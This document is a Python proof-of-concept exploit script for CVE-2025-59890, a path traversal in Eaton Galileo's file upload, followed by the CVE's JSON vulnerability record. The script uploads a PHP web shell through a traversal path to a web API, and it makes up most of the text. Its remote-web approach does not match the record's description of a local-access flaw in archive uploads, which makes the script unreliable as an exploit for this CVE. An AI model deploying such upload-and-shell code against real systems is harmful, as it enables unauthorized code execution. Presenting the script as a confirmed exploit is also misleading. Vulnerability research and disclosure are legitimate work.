CVE-2025-59890

#!/usr/bin/env python3 """ CVE-2025-59890 PoC - Eaton Galileo Path Traversal in File Upload Note: This is a demonstration code for security testing purposes only. Ensure you have explicit permission before testing any system. """ import requests import sys def exploit_galileo(target_url, file_path, target_directory): """ Exploit path traversal vulnerability in Eaton Galileo file upload Args: target_url: Base URL of the Galileo web interface file_path: Path to the malicious file to upload target_directory: Target directory using path traversal (e.g., ../../var/www/html) """ # Construct the path traversal payload # The vulnerability allows directory traversal via improper input sanitization traversal_payload = f"{target_directory}/uploaded_shell.php" # Read the malicious file try: with open(file_path, 'rb') as f: file_content = f.read() except FileNotFoundError: print(f"[-] Error: File {file_path} not found") return False # Construct the upload request upload_url = f"{target_url}/api/file/upload" files = { 'file': (traversal_payload, file_content, 'application/x-php') } data = { 'path': traversal_payload } try: print(f"[*] Attempting to upload malicious file to {traversal_payload}") response = requests.post(upload_url, files=files, data=data, timeout=10) if response.status_code == 200: print("[+] File upload successful - Path traversal vulnerability confirmed") print(f"[+] Malicious file may be accessible at: {target_url}/{traversal_payload}") return True else: print(f"[-] Upload failed with status code: {response.status_code}") return False except requests.exceptions.RequestException as e: print(f"[-] Request failed: {e}") return False if __name__ == "__main__": if len(sys.argv) < 4: print("Usage: python3 cve-2025-59890-poc.py <target_url> <file_path> <target_dir>") print("Example: python3 cve-2025-59890-poc.py http://target.com:8080 shell.php '../../var/www/html'") sys.exit(1) exploit_galileo(sys.argv[1], sys.argv[2], sys.argv[3])

{"cve": {"id": "CVE-2025-59890", "sourceIdentifier": "[email protected]", "published": "2025-11-27T11:15:48.080", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper input sanitization in the file archives upload functionality of Eaton Galileo software allows traversing paths which could lead into an attacker with local access to execute unauthorized code or commands. This security issue has been fixed in the latest version of Galileo which is available on the Eaton download center."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:C/C:L/I:L/A:H", "baseScore": 7.3, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.5, "impactScore": 5.3}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-22"}]}], "references": [{"url": "https://www.eaton.com/content/dam/eaton/company/news-insights/cybersecurity/security-bulletins/etn-va-2025-1024.pdf", "source": "[email protected]"}]}}